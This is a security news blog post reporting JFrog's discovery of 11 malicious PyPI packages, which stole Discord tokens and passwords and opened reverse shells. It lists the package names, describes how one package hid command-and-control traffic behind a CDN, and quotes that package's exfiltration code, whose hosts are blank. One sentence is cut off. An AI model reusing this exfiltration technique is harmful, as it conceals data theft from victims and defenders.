Nov 23 2021

Experts found 11 malicious Python packages in the PyPI repository

Category: PythonDISC @ 10:15 am

JFrog researchers have discovered 11 malicious Python packages in the Python Package Index (PyPI) repository that can steal Discord access tokens, passwords, and even carry out dependency confusion attacks.

Below is the list of malicious Python packages:

  • importantpackage / important-package
  • pptest
  • ipboards
  • owlmoon
  • DiscordSafety
  • trrfab
  • 10Cent10 / 10Cent11
  • yandex-yt
  • yiffparty

The packages “importantpackage,” “10Cent10,” and “10Cent11” were able to establish a reverse shell on the compromised machine.

Experts pointed out that the “importantpackage” abused CDN TLS termination for data exfiltration. It uses the Fastly CDN to disguise communications with the C2 server as a communication with

“The malware’s communication is quite simple:

url = "" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': ""})

This code causes an HTTPS request to be sent to (which is indistinguishable from a legitimate request to PyPI,) which later gets rerouted by the CDN as an HTTP request to the C2 server (and vice versa, allowing for two-way communication).” states the report published by JFrog.

Modern Computing in Simple Packages

Tags: PyPI repository, Python packages